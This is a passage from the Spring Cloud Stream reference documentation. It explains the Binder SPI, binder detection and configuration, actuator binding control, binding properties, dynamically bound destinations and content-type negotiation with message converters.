Java DSL for Spring Integration:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n @Bean\n public Publisher<Message<String>> emit() {\n return IntegrationFlows.from(() ->\n new GenericMessage<>(\"Hello World\"),\n e -> e.poller(p -> p.fixedDelay(1)))\n .toReactivePublisher();\n }\n}\n----\n\n[[spring-cloud-stream-overview-binders]]\n== Binders\n\nSpring Cloud Stream provides a Binder abstraction for use in connecting to physical destinations at the external middleware.\nThis section provides information about the main concepts behind the Binder SPI, its main components, and implementation-specific details.\n\n=== Producers and Consumers\n\nThe following image shows the general relationship of producers and consumers:\n\n.Producers and Consumers\nimage::producers-consumers.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nA producer is any component that sends messages to a channel.\nThe channel can be bound to an external message broker with a `Binder` implementation for that broker.\nWhen invoking the `bindProducer()` method, the first parameter is the name of the destination within the broker, the second parameter is the local channel instance to which the producer sends messages, and the third parameter contains properties (such as a partition key expression) to be used within the adapter that is created for that channel.\n\nA consumer is any component that receives messages from a channel.\nAs with a producer, the consumer's channel can be bound to an external message broker.\nWhen invoking the `bindConsumer()` method, the first parameter is the destination name, and a second parameter provides the name of a logical group of consumers.\nEach group that is represented by consumer bindings for a given destination receives a copy of each message that a producer sends to that destination (that is, it follows normal publish-subscribe semantics).\nIf there are multiple consumer instances bound with the same group name, then messages are load-balanced across those consumer instances so that each message sent by a producer is consumed by only a single consumer instance within each group (that is, it follows normal queueing semantics).\n\n[[spring-cloud-stream-overview-binder-api]]\n=== Binder SPI\n\nThe Binder SPI consists of a number of interfaces, out-of-the box utility classes, and discovery strategies that provide a pluggable mechanism for connecting to external middleware.\n\nThe key point of the SPI is the `Binder` interface, which is a strategy for connecting inputs and outputs to external middleware. The following listing shows the definnition of the `Binder` interface:\n\n[source,java]\n----\npublic interface Binder<T, C extends ConsumerProperties, P extends ProducerProperties> {\n Binding<T> bindConsumer(String name, String group, T inboundBindTarget, C consumerProperties);\n\n Binding<T> bindProducer(String name, T outboundBindTarget, P producerProperties);\n}\n----\n\nThe interface is parameterized, offering a number of extension points:\n\n* Input and output bind targets. As of version 1.0, only `MessageChannel` is supported, but this is intended to be used as an extension point in the future.\n* Extended consumer and producer properties, allowing specific Binder implementations to add supplemental properties that can be supported in a type-safe manner.\n\nA typical binder implementation consists of the following:\n\n* A class that implements the `Binder` interface;\n* A Spring `@Configuration` class that creates a bean of type `Binder` along with the middleware connection infrastructure.\n* A `META-INF\/spring.binders` file found on the classpath containing one or more binder definitions, as shown in the following example:\n+\n[source]\n----\nkafka:\\\norg.springframework.cloud.stream.binder.kafka.config.KafkaBinderConfiguration\n----\n\n=== Binder Detection\n\nSpring Cloud Stream relies on implementations of the Binder SPI to perform the task of connecting channels to message brokers.\nEach Binder implementation typically connects to one type of messaging system.\n\n==== Classpath Detection\n\nBy default, Spring Cloud Stream relies on Spring Boot's auto-configuration to configure the binding process.\nIf a single Binder implementation is found on the classpath, Spring Cloud Stream automatically uses it.\nFor example, a Spring Cloud Stream project that aims to bind only to RabbitMQ can add the following dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-binder-rabbit<\/artifactId>\n<\/dependency>\n----\n\nFor the specific Maven coordinates of other binder dependencies, see the documentation of that binder implementation.\n\n[[multiple-binders]]\n=== Multiple Binders on the Classpath\n\nWhen multiple binders are present on the classpath, the application must indicate which binder is to be used for each channel binding.\nEach binder configuration contains a `META-INF\/spring.binders` file, which is a simple properties file, as shown in the following example:\n\n[source]\n----\nrabbit:\\\norg.springframework.cloud.stream.binder.rabbit.config.RabbitServiceAutoConfiguration\n----\n\nSimilar files exist for the other provided binder implementations (such as Kafka), and custom binder implementations are expected to provide them as well.\nThe key represents an identifying name for the binder implementation, whereas the value is a comma-separated list of configuration classes that each contain one and only one bean definition of type `org.springframework.cloud.stream.binder.Binder`.\n\nBinder selection can either be performed globally, using the `spring.cloud.stream.defaultBinder` property (for example, `spring.cloud.stream.defaultBinder=rabbit`) or individually, by configuring the binder on each channel binding.\nFor instance, a processor application (that has channels named `input` and `output` for read and write respectively) that reads from Kafka and writes to RabbitMQ can specify the following configuration:\n\n[source]\n----\nspring.cloud.stream.bindings.input.binder=kafka\nspring.cloud.stream.bindings.output.binder=rabbit\n----\n\n[[multiple-systems]]\n=== Connecting to Multiple Systems\n\nBy default, binders share the application's Spring Boot auto-configuration, so that one instance of each binder found on the classpath is created.\nIf your application should connect to more than one broker of the same type, you can specify multiple binder configurations, each with different environment settings.\n\nNOTE: Turning on explicit binder configuration disables the default binder configuration process altogether.\nIf you do so, all binders in use must be included in the configuration.\nFrameworks that intend to use Spring Cloud Stream transparently may create binder configurations that can be referenced by name, but they do not affect the default binder configuration.\nIn order to do so, a binder configuration may have its `defaultCandidate` flag set to false (for example, `spring.cloud.stream.binders.<configurationName>.defaultCandidate=false`).\nThis denotes a configuration that exists independently of the default binder configuration process.\n\nThe following example shows a typical configuration for a processor application that connects to two RabbitMQ broker instances:\n\n[source,yml]\n----\nspring:\n cloud:\n stream:\n bindings:\n input:\n destination: thing1\n binder: rabbit1\n output:\n destination: thing2\n binder: rabbit2\n binders:\n rabbit1:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host1>\n rabbit2:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host2>\n----\n\n=== Binding visualization and control\nSince version 2.0, Spring Cloud Stream supports visualization and control of the Bindings through Actuator endpoints.\n\nStarting with version 2.0 actuator and web are optional, you must first add one of the web dependencies as well as add the actuator dependency manually.\nThe following example shows how to add the dependency for the Web framework:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-web<\/artifactId>\n<\/dependency>\n----\n\nThe following example shows how to add the dependency for the WebFlux framework:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-webflux<\/artifactId>\n<\/dependency>\n----\n\nYou can add the Actuator dependency as follows:\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n<\/dependency>\n----\n\nNOTE: To run Spring Cloud Stream 2.0 apps in Cloud Foundry, you must add `spring-boot-starter-web` and `spring-boot-starter-actuator` to the classpath. Otherwise, the\napplication will not start due to health check failures.\n\nYou must also enable the `bindings` actuator endpoints by setting the following property: `--management.endpoints.web.exposure.include=bindings`.\n\nOnce those prerequisites are satisfied. you should see the following in the logs when application start:\n\n\t: Mapped \"{[\/actuator\/bindings\/{name}],methods=[POST]. . .\n\t: Mapped \"{[\/actuator\/bindings],methods=[GET]. . .\n\t: Mapped \"{[\/actuator\/bindings\/{name}],methods=[GET]. . .\n\nTo visualize the current bindings, access the following URL:\n`http:\/\/<host>:<port>\/actuator\/bindings`\n\nAlternative, to see a single binding, access one of the URLs similar to the following:\n`http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName`\n\nYou can also stop, start, pause, and resume individual bindings by posting to the same URL while providing a `state` argument as JSON, as shown in the following examples:\n\ncurl -d '{\"state\":\"STOPPED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"STARTED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"PAUSED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\ncurl -d '{\"state\":\"RESUMED\"}' -H \"Content-Type: application\/json\" -X POST http:\/\/<host>:<port>\/actuator\/bindings\/myBindingName\n\nNOTE: `PAUSED` and `RESUMED` work only when the corresponding binder and its underlying technology supports it. Otherwise, you see the warning message in the logs.\nCurrently, only Kafka binder supports the `PAUSED` and `RESUMED` states.\n\n=== Binder Configuration Properties\n\nThe following properties are available when customizing binder configurations. These properties exposed via `org.springframework.cloud.stream.config.BinderProperties`\n\nThey must be prefixed with `spring.cloud.stream.binders.<configurationName>`.\n\ntype::\nThe binder type.\nIt typically references one of the binders found on the classpath -- in particular, a key in a `META-INF\/spring.binders` file.\n+\nBy default, it has the same value as the configuration name.\ninheritEnvironment::\nWhether the configuration inherits the environment of the application itself.\n+\nDefault: `true`.\nenvironment::\nRoot for a set of properties that can be used to customize the environment of the binder.\nWhen this property is set, the context in which the binder is being created is not a child of the application context.\nThis setting allows for complete separation between the binder components and the application components.\n+\nDefault: `empty`.\ndefaultCandidate::\nWhether the binder configuration is a candidate for being considered a default binder or can be used only when explicitly referenced.\nThis setting allows adding binder configurations without interfering with the default processing.\n+\nDefault: `true`.\n\n== Configuration Options\n\nSpring Cloud Stream supports general configuration options as well as configuration for bindings and binders.\nSome binders let additional binding properties support middleware-specific features.\n\nConfiguration options can be provided to Spring Cloud Stream applications through any mechanism supported by Spring Boot.\nThis includes application arguments, environment variables, and YAML or .properties files.\n\n=== Binding Service Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.config.BindingServiceProperties`\n\nspring.cloud.stream.instanceCount::\nThe number of deployed instances of an application.\nMust be set for partitioning on the producer side. Must be set on the consumer side when using RabbitMQ and with Kafka if `autoRebalanceEnabled=false`.\n+\nDefault: `1`.\n\nspring.cloud.stream.instanceIndex::\nThe instance index of the application: A number from `0` to `instanceCount - 1`.\nUsed for partitioning with RabbitMQ and with Kafka if `autoRebalanceEnabled=false`.\nAutomatically set in Cloud Foundry to match the application's instance index.\n\nspring.cloud.stream.dynamicDestinations::\nA list of destinations that can be bound dynamically (for example, in a dynamic routing scenario).\nIf set, only listed destinations can be bound.\n+\nDefault: empty (letting any destination be bound).\n\nspring.cloud.stream.defaultBinder::\nThe default binder to use, if multiple binders are configured.\nSee <<multiple-binders,Multiple Binders on the Classpath>>.\n+\nDefault: empty.\n\nspring.cloud.stream.overrideCloudConnectors::\nThis property is only applicable when the `cloud` profile is active and Spring Cloud Connectors are provided with the application.\nIf the property is `false` (the default), the binder detects a suitable bound service (for example, a RabbitMQ service bound in Cloud Foundry for the RabbitMQ binder) and uses it for creating connections (usually through Spring Cloud Connectors).\nWhen set to `true`, this property instructs binders to completely ignore the bound services and rely on Spring Boot properties (for example, relying on the `spring.rabbitmq.*` properties provided in the environment for the RabbitMQ binder).\nThe typical usage of this property is to be nested in a customized environment <<multiple-systems, when connecting to multiple systems>>.\n+\nDefault: `false`.\n\nspring.cloud.stream.bindingRetryInterval::\nThe interval (in seconds) between retrying binding creation when, for example, the binder does not support late binding and the broker (for example, Apache Kafka) is down.\nSet it to zero to treat such conditions as fatal, preventing the application from starting.\n+\nDefault: `30`\n\n[[binding-properties]]\n=== Binding Properties\n\nBinding properties are supplied by using the format of `spring.cloud.stream.bindings.<channelName>.<property>=<value>`.\nThe `<channelName>` represents the name of the channel being configured (for example, `output` for a `Source`).\n\nTo avoid repetition, Spring Cloud Stream supports setting values for all channels, in the format of `spring.cloud.stream.default.<property>=<value>`.\n\nWhen it comes to avoiding repetitions for extended binding properties, this format should be used - `spring.cloud.stream.<binder-type>.default.<producer|consumer>.<property>=<value>`.\n\nIn what follows, we indicate where we have omitted the `spring.cloud.stream.bindings.<channelName>.` prefix and focus just on the property name, with the understanding that the prefix ise included at runtime.\n\n==== Common Binding Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.config.BindingProperties`\n\nThe following binding properties are available for both input and output bindings and must be prefixed with `spring.cloud.stream.bindings.<channelName>.` (for example, `spring.cloud.stream.bindings.input.destination=ticktock`).\n\nDefault values can be set by using the `spring.cloud.stream.default` prefix (for example`spring.cloud.stream.default.contentType=application\/json`).\n\ndestination::\nThe target destination of a channel on the bound middleware (for example, the RabbitMQ exchange or Kafka topic).\nIf the channel is bound as a consumer, it could be bound to multiple destinations, and the destination names can be specified as comma-separated `String` values.\nIf not set, the channel name is used instead.\nThe default value of this property cannot be overridden.\ngroup::\nThe consumer group of the channel.\nApplies only to inbound bindings.\nSee <<consumer-groups,Consumer Groups>>.\n+\nDefault: `null` (indicating an anonymous consumer).\ncontentType::\nThe content type of the channel.\nSee \"`<<content-type-management>>`\".\n+\nDefault: `application\/json`.\nbinder::\nThe binder used by this binding.\nSee \"`<<multiple-binders>>`\" for details.\n+\nDefault: `null` (the default binder is used, if it exists).\n\n==== Consumer Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.binder.ConsumerProperties`\n\nThe following binding properties are available for input bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.consumer.` (for example, `spring.cloud.stream.bindings.input.consumer.concurrency=3`).\n\nDefault values can be set by using the `spring.cloud.stream.default.consumer` prefix (for example, `spring.cloud.stream.default.consumer.headerMode=none`).\n\nconcurrency::\nThe concurrency of the inbound consumer.\n+\nDefault: `1`.\npartitioned::\nWhether the consumer receives data from a partitioned producer.\n+\nDefault: `false`.\nheaderMode::\nWhen set to `none`, disables header parsing on input.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nThis option is useful when consuming data from non-Spring Cloud Stream applications when native headers are not supported.\nWhen set to `headers`, it uses the middleware's native header mechanism.\nWhen set to `embeddedHeaders`, it embeds headers into the message payload.\n+\nDefault: depends on the binder implementation.\nmaxAttempts::\nIf processing fails, the number of attempts to process the message (including the first).\nSet to `1` to disable retry.\n+\nDefault: `3`.\nbackOffInitialInterval::\nThe backoff initial interval on retry.\n+\nDefault: `1000`.\nbackOffMaxInterval::\nThe maximum backoff interval.\n+\nDefault: `10000`.\nbackOffMultiplier::\nThe backoff multiplier.\n+\nDefault: `2.0`.\ndefaultRetryable::\nWhether exceptions thrown by the listener that are not listed in the `retryableExceptions` are retryable.\n+\nDefault: `true`.\ninstanceIndex::\nWhen set to a value greater than equal to zero, it allows customizing the instance index of this consumer (if different from `spring.cloud.stream.instanceIndex`).\nWhen set to a negative value, it defaults to `spring.cloud.stream.instanceIndex`.\nSee \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\" for more information.\n+\nDefault: `-1`.\ninstanceCount::\nWhen set to a value greater than equal to zero, it allows customizing the instance count of this consumer (if different from `spring.cloud.stream.instanceCount`).\nWhen set to a negative value, it defaults to `spring.cloud.stream.instanceCount`.\nSee \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\" for more information.\n+\nDefault: `-1`.\nretryableExceptions::\nA map of Throwable class names in the key and a boolean in the value.\nSpecify those exceptions (and subclasses) that will or won't be retried.\nAlso see `defaultRetriable`.\nExample: `spring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false`.\n+\nDefault: empty.\nuseNativeDecoding::\nWhen set to `true`, the inbound message is deserialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka producer value deserializer).\nWhen this configuration is being used, the inbound message unmarshalling is not based on the `contentType` of the binding.\nWhen native decoding is used, it is the responsibility of the producer to use an appropriate encoder (for example, the Kafka producer value serializer) to serialize the outbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the producer property `useNativeEncoding`.\n+\nDefault: `false`.\n\n\n==== Producer Properties\n\nThese properties are exposed via `org.springframework.cloud.stream.binder.ProducerProperties`\n\nThe following binding properties are available for output bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.producer.` (for example, `spring.cloud.stream.bindings.input.producer.partitionKeyExpression=payload.id`).\n\nDefault values can be set by using the prefix `spring.cloud.stream.default.producer` (for example, `spring.cloud.stream.default.producer.partitionKeyExpression=payload.id`).\n\npartitionKeyExpression::\nA SpEL expression that determines how to partition outbound data.\nIf set, or if `partitionKeyExtractorClass` is set, outbound data on this channel is partitioned. `partitionCount` must be set to a value greater than 1 to be effective.\nMutually exclusive with `partitionKeyExtractorClass`.\nSee \"`<<partitioning>>`\".\n+\nDefault: null.\npartitionKeyExtractorClass::\nA `PartitionKeyExtractorStrategy` implementation.\nIf set, or if `partitionKeyExpression` is set, outbound data on this channel is partitioned. `partitionCount` must be set to a value greater than 1 to be effective.\nMutually exclusive with `partitionKeyExpression`.\nSee \"`<<partitioning>>`\".\n+\nDefault: `null`.\npartitionSelectorClass::\n A `PartitionSelectorStrategy` implementation.\nMutually exclusive with `partitionSelectorExpression`.\nIf neither is set, the partition is selected as the `hashCode(key) % partitionCount`, where `key` is computed through either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: `null`.\npartitionSelectorExpression::\nA SpEL expression for customizing partition selection.\nMutually exclusive with `partitionSelectorClass`.\nIf neither is set, the partition is selected as the `hashCode(key) % partitionCount`, where `key` is computed through either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: `null`.\npartitionCount::\nThe number of target partitions for the data, if partitioning is enabled.\nMust be set to a value greater than 1 if the producer is partitioned.\nOn Kafka, it is interpreted as a hint. The larger of this and the partition count of the target topic is used instead.\n+\nDefault: `1`.\nrequiredGroups::\nA comma-separated list of groups to which the producer must ensure message delivery even if they start after it has been created (for example, by pre-creating durable queues in RabbitMQ).\nheaderMode::\nWhen set to `none`, it disables header embedding on output.\nIt is effective only for messaging middleware that does not support message headers natively and requires header embedding.\nThis option is useful when producing data for non-Spring Cloud Stream applications when native headers are not supported.\nWhen set to `headers`, it uses the middleware's native header mechanism.\nWhen set to `embeddedHeaders`, it embeds headers into the message payload.\n+\nDefault: Depends on the binder implementation.\nuseNativeEncoding::\nWhen set to `true`, the outbound message is serialized directly by the client library, which must be configured correspondingly (for example, setting an appropriate Kafka producer value serializer).\nWhen this configuration is being used, the outbound message marshalling is not based on the `contentType` of the binding.\nWhen native encoding is used, it is the responsibility of the consumer to use an appropriate decoder (for example, the Kafka consumer value de-serializer) to deserialize the inbound message.\nAlso, when native encoding and decoding is used, the `headerMode=embeddedHeaders` property is ignored and headers are not embedded in the message.\nSee the consumer property `useNativeDecoding`.\n+\nDefault: `false`.\nerrorChannelEnabled::\nWhen set to `true`, if the binder supports asynchroous send results, send failures are sent to an error channel for the destination.\nSee \"`<<binder-error-channels>>`\" for more information.\n+\nDefault: `false`.\n\n[[dynamicdestination]]\n=== Using Dynamically Bound Destinations\n\nBesides the channels defined by using `@EnableBinding`, Spring Cloud Stream lets applications send messages to dynamically bound destinations.\nThis is useful, for example, when the target destination needs to be determined at runtime.\nApplications can do so by using the `BinderAwareChannelResolver` bean, registered automatically by the `@EnableBinding` annotation.\n\nThe 'spring.cloud.stream.dynamicDestinations' property can be used for restricting the dynamic destination names to a known set (whitelisting).\nIf this property is not set, any destination can be bound dynamically.\n\nThe `BinderAwareChannelResolver` can be used directly, as shown in the following example of a REST controller using a path variable to decide the target channel:\n\n[source,java]\n----\n@EnableBinding\n@Controller\npublic class SourceWithDynamicDestination {\n\n @Autowired\n private BinderAwareChannelResolver resolver;\n\n @RequestMapping(path = \"\/{target}\", method = POST, consumes = \"*\/*\")\n @ResponseStatus(HttpStatus.ACCEPTED)\n public void handleRequest(@RequestBody String body, @PathVariable(\"target\") target,\n @RequestHeader(HttpHeaders.CONTENT_TYPE) Object contentType) {\n sendMessage(body, target, contentType);\n }\n\n private void sendMessage(String body, String target, Object contentType) {\n resolver.resolveDestination(target).send(MessageBuilder.createMessage(body,\n new MessageHeaders(Collections.singletonMap(MessageHeaders.CONTENT_TYPE, contentType))));\n }\n}\n----\n\nNow consider what happens when we start the application on the default port (8080) and make the following requests with CURL:\n\n----\ncurl -H \"Content-Type: application\/json\" -X POST -d \"customer-1\" http:\/\/localhost:8080\/customers\n\ncurl -H \"Content-Type: application\/json\" -X POST -d \"order-1\" http:\/\/localhost:8080\/orders\n----\n\nThe destinations, 'customers' and 'orders', are created in the broker (in the exchange for Rabbit or in the topic for Kafka) with names of 'customers' and 'orders', and the data is published to the appropriate destinations.\n\nThe `BinderAwareChannelResolver` is a general-purpose Spring Integration `DestinationResolver` and can be injected in other components -- for example, in a router using a SpEL expression based on the `target` field of an incoming JSON message. The following example includes a router that reads SpEL expressions:\n\n[source,java]\n----\n@EnableBinding\n@Controller\npublic class SourceWithDynamicDestination {\n\n @Autowired\n private BinderAwareChannelResolver resolver;\n\n\n @RequestMapping(path = \"\/\", method = POST, consumes = \"application\/json\")\n @ResponseStatus(HttpStatus.ACCEPTED)\n public void handleRequest(@RequestBody String body, @RequestHeader(HttpHeaders.CONTENT_TYPE) Object contentType) {\n sendMessage(body, contentType);\n }\n\n private void sendMessage(Object body, Object contentType) {\n routerChannel().send(MessageBuilder.createMessage(body,\n new MessageHeaders(Collections.singletonMap(MessageHeaders.CONTENT_TYPE, contentType))));\n }\n\n @Bean(name = \"routerChannel\")\n public MessageChannel routerChannel() {\n return new DirectChannel();\n }\n\n @Bean\n @ServiceActivator(inputChannel = \"routerChannel\")\n public ExpressionEvaluatingRouter router() {\n ExpressionEvaluatingRouter router =\n new ExpressionEvaluatingRouter(new SpelExpressionParser().parseExpression(\"payload.target\"));\n router.setDefaultOutputChannelName(\"default-output\");\n router.setChannelResolver(resolver);\n return router;\n }\n}\n----\n\nThe https:\/\/github.com\/spring-cloud-stream-app-starters\/router[Router Sink Application] uses this technique to create the destinations on-demand.\n\nIf the channel names are known in advance, you can configure the producer properties as with any other destination.\nAlternatively, if you register a `NewDestinationBindingCallback<>` bean, it is invoked just before the binding is created.\nThe callback takes the generic type of the extended producer properties used by the binder.\nIt has one method:\n\n[source, java]\n----\nvoid configure(String channelName, MessageChannel channel, ProducerProperties producerProperties,\n T extendedProducerProperties);\n----\n\nThe following example shows how to use the RabbitMQ binder:\n\n[source, java]\n----\n@Bean\npublic NewDestinationBindingCallback<RabbitProducerProperties> dynamicConfigurer() {\n return (name, channel, props, extended) -> {\n props.setRequiredGroups(\"bindThisQueue\");\n extended.setQueueNameGroupOnly(true);\n extended.setAutoBindDlq(true);\n extended.setDeadLetterQueueName(\"myDLQ\");\n };\n}\n----\n\nNOTE: If you need to support dynamic destinations with multiple binder types, use `Object` for the generic type and cast the `extended` argument as needed.\n\n[[content-type-management]]\n== Content Type Negotiation\n\nData transformation is one of the core features of any message-driven microservice architecture. Given that, in Spring Cloud Stream, such data\nis represented as a Spring `Message`, a message may have to be transformed to a desired shape or size before reaching its destination. This is required for two reasons:\n\n. To convert the contents of the incoming message to match the signature of the application-provided handler.\n\n. To convert the contents of the outgoing message to the wire format.\n\nThe wire format is typically `byte[]` (that is true for the Kafka and Rabbit binders), but it is governed by the binder implementation.\n\nIn Spring Cloud Stream, message transformation is accomplished with an `org.springframework.messaging.converter.MessageConverter`.\n\nNOTE: As a supplement to the details to follow, you may also want to read the following https:\/\/spring.io\/blog\/2018\/02\/26\/spring-cloud-stream-2-0-content-type-negotiation-and-transformation[blog post].\n\n=== Mechanics\n\nTo better understand the mechanics and the necessity behind content-type negotiation, we take a look at a very simple use case by using the following message handler as an example:\n\n[source, java]\n----\n@StreamListener(Processor.INPUT)\n@SendTo(Processor.OUTPUT)\npublic String handle(Person person) {..}\n----\n\nNOTE: For simplicity, we assume that this is the only handler in the application (we assume there is no internal pipeline).\n\nThe handler shown in the preceding example expects a `Person` object as an argument and produces a `String` type as an output.\nIn order for the framework to succeed in passing the incoming `Message` as an argument to this handler, it has to somehow transform the payload of the `Message` type from the wire format to a `Person` type.\nIn other words, the framework must locate and apply the appropriate `MessageConverter`.\nTo accomplish that, the framework needs some instructions from the user.\nOne of these instructions is already provided by the signature of the handler method itself (`Person` type).\nConsequently, in theory, that should be (and, in some cases, is) enough.\nHowever, for the majority of use cases, in order to select the appropriate `MessageConverter`, the framework needs an additional piece of information.\nThat missing piece is `contentType`.\n\nSpring Cloud Stream provides three mechanisms to define `contentType` (in order of precedence):\n\n. *HEADER*: The `contentType` can be communicated through the Message itself. By providing a `contentType` header, you declare the content type to use to locate and apply the appropriate `MessageConverter`.\n\n. *BINDING*: The `contentType` can be set per destination binding by setting the `spring.cloud.stream.bindings.input.content-type` property.\n+\nNOTE: The `input` segment in the property name corresponds to the actual name of the destination (which is \u201cinput\u201d in our case). This approach lets you declare, on a per-binding basis, the content type to use to locate and apply the appropriate `MessageConverter`.\n\n. *DEFAULT*: If `contentType` is not present in the `Message` header or the binding, the default `application\/json` content type is used to\nlocate and apply the appropriate `MessageConverter`.\n\nAs mentioned earlier, the preceding list also demonstrates the order of precedence in case of a tie. For example, a header-provided content type takes precedence over any other content type.\nThe same applies for a content type set on a per-binding basis, which essentially lets you override the default content type.\nHowever, it also provides a sensible default (which was determined from community feedback).\n\nAnother reason for making `application\/json` the default stems from the interoperability requirements driven by distributed microservices architectures, where producer and consumer not only run in different JVMs but can also run on different non-JVM platforms.\n\nWhen the non-void handler method returns, if the the return value is already a `Message`, that `Message` becomes the payload. However, when the return value is not a `Message`, the new `Message` is constructed with the return value as the payload while inheriting\nheaders from the input `Message` minus the headers defined or filtered by `SpringIntegrationProperties.messageHandlerNotPropagatedHeaders`.\nBy default, there is only one header set there: `contentType`. This means that the new `Message` does not have `contentType` header set, thus ensuring that the `contentType` can evolve.\nYou can always opt out of returning a `Message` from the handler method where you can inject any header you wish.\n\nIf there is an internal pipeline, the `Message` is sent to the next handler by going through the same process of conversion. However, if there is no internal pipeline or you have reached the end of it, the `Message` is sent back to the output destination.\n\n==== Content Type versus Argument Type\n\nAs mentioned earlier, for the framework to select the appropriate `MessageConverter`, it requires argument type and, optionally, content type information.\nThe logic for selecting the appropriate `MessageConverter` resides with the argument resolvers (`HandlerMethodArgumentResolvers`), which trigger right before the invocation of the user-defined handler method (which is when the actual argument type is known to the framework).\nIf the argument type does not match the type of the current payload, the framework delegates to the stack of the\npre-configured `MessageConverters` to see if any one of them can convert the payload.\nAs you can see, the `Object fromMessage(Message<?> message, Class<?> targetClass);`\noperation of the MessageConverter takes `targetClass` as one of its arguments.\nThe framework also ensures that the provided `Message` always contains a `contentType` header.\nWhen no contentType header was already present, it injects either the per-binding `contentType` header or the default `contentType` header.\nThe combination of `contentType` argument type is the mechanism by which framework determines if message can be converted to a target type.\nIf no appropriate `MessageConverter` is found, an exception is thrown, which you can handle by adding a custom `MessageConverter` (see \"`<<spring-cloud-stream-overview-user-defined-message-converters>>`\").\n\nBut what if the payload type matches the target type declared by the handler method? In this case, there is nothing to convert, and the\npayload is passed unmodified. While this sounds pretty straightforward and logical, keep in mind handler methods that take a `Message<?>` or `Object` as an argument.\nBy declaring the target type to be `Object` (which is an `instanceof` everything in Java), you essentially forfeit the conversion process.\n\nNOTE: Do not expect `Message` to be converted into some other type based only on the `contentType`.\nRemember that the `contentType` is complementary to the target type.\nIf you wish, you can provide a hint, which `MessageConverter` may or may not take into consideration.\n\n==== Message Converters\n\n`MessageConverters` define two methods:\n\n[source, java]\n----\nObject fromMessage(Message<?> message, Class<?> targetClass);\n\nMessage<?> toMessage(Object payload, @Nullable MessageHeaders headers);\n----\n\nIt is important to understand the contract of these methods and their usage, specifically in the context of Spring Cloud Stream.\n\nThe `fromMessage` method converts an incoming `Message` to an argument type.\nThe payload of the `Message` could be any type, and it is\nup to the actual implementation of the `MessageConverter` to support multiple types.\nFor example, some JSON converter may support the payload type as `byte[]`, `String`, and others.\nThis is important when the application contains an internal pipeline (that is, input -> handler1 -> handler2 ->. . . -> output) and the output of the upstream handler results in a `Message` which may not be in the initial wire format.\n\nHowever, the `toMessage` method has a more strict contract and must always convert `Message` to the wire format: `byte[]`.\n\nSo, for all intents and purposes (and especially when implementing your own converter) you regard the two methods as having the following signatures:\n\n[source, java]\n----\nObject fromMessage(Message<?> message, Class<?> targetClass);\n\nMessage<byte[]> toMessage(Object payload, @Nullable MessageHeaders headers);\n----\n\n=== Provided MessageConverters\n\nAs mentioned earlier, the framework already provides a stack of `MessageConverters` to handle most common use cases.\nThe following list describes the provided `MessageConverters`, in order of precedence (the first `MessageConverter` that works is used):\n\n. `ApplicationJsonMessageMarshallingConverter`: Variation of the `org.springframework.messaging.converter.MappingJackson2MessageConverter`. Supports conversion of the payload of the `Message` to\/from POJO for cases when `contentType` is `application\/json` (DEFAULT).\n. `TupleJsonMessageConverter`: *DEPRECATED* Supports conversion of the payload of the `Message` to\/from `org.springframework.tuple.Tuple`.\n. `ByteArrayMessageConverter`: Supports conversion of the payload of the `Message` from `byte[]` to `byte[]` for cases when `contentType` is `application\/octet-stream`. It is essentially a pass through and exists primarily for backward compatibility.\n. `ObjectStringMessageConverter`: Supports conversion of any type to a `String` when `contentType` is `text\/plain`.\nIt invokes Object\u2019s `toString()` method or, if the payload is `byte[]`, a new `String(byte[])`.\n. `JavaSerializationMessageConverter`: *DEPRECATED* Supports conversion based on java serialization when `contentType` is `application\/x-java-serialized-object`.\n. `KryoMessageConverter`: *DEPRECATED* Supports conversion based on Kryo serialization when `contentType` is `application\/x-java-object`.\n. `JsonUnmarshallingConverter`: Similar to the `ApplicationJsonMessageMarshallingConverter`. It supports conversion of any type when `contentType` is `application\/x-java-object`.\nIt expects the actual type information to be embedded in the `contentType` as an attribute (for example, `application\/x-java-object;type=foo.bar.Cat`).\n\nWhen no appropriate converter is found, the framework throws an exception. When that happens, you should check your code and configuration and ensure you did not miss anything (that is, ensure that you provided a `contentType` by using a binding or a header).\nHowever, most likely, you found some uncommon case (such as a custom `contentType` perhaps) and the current stack of provided `MessageConverters`\ndoes not know how to convert. If that is the case, you can add custom `MessageConverter`. See <<spring-cloud-stream-overview-user-defined-message-converters>>.\n\n[[spring-cloud-stream-overview-user-defined-message-converters]]\n=== User-defined Message Converters\n\nSpring Cloud Stream exposes a mechanism to define and register additional `MessageConverters`.\nTo use it, implement `org.springframework.messaging.converter.MessageConverter`, configure it as a `@Bean`, and annotate it with `@StreamMessageConverter`.\nIt is then apended to the existing stack of 